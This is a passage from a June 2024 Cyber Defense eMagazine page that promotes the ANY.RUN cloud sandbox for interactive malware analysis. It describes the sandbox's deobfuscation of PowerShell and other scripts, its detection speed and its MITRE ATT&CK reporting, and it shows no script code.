Deobfuscated PowerShell script displayed by the sandbox

            Interactive  sandboxes  like  ANY.RUN  not  only  detect  scripts,  including  JScript,  VBA,  and  VBScript,
            executed during the analysis, but also offer a detailed breakdown of their functions, as well as their inputs
            and outputs. The same goes for PowerShell scripts, found to be the fourth most prevalent TTP in Q1 of
            2024. An interactive sandbox simplifies their analysis, presenting a deobfuscated variant of the script for
            a clearer view of its purpose.



            Interactive Malware Analysis with ANY.RUN

            ANY.RUN  is  a  cloud-based  sandbox  designed  for  interactive  analysis.  Thanks  to  the  use  of  VNC
            technology, users can gain full control over the Windows and Linux VMs and interact with the system
            directly.

            The sandbox on average detects threats in under 40 seconds and extracts indicators of compromise, as
            well as malware configs of both emerging and persisting malware families.


            The  service  comes  equipped  with  advanced  tools  for  network,  registry,  and  process  analysis.  It
            automatically  maps  all  the  malicious  behavior  to  the  MITRE  ATT&CK  matrix  and  generates  a
            downloadable report featuring the findings collected during the analysis.











            Cyber Defense eMagazine – June 2024 Edition                                                                                                                                                                                                          183
            Copyright © 2024, Cyber Defense Magazine. All rights reserved worldwide.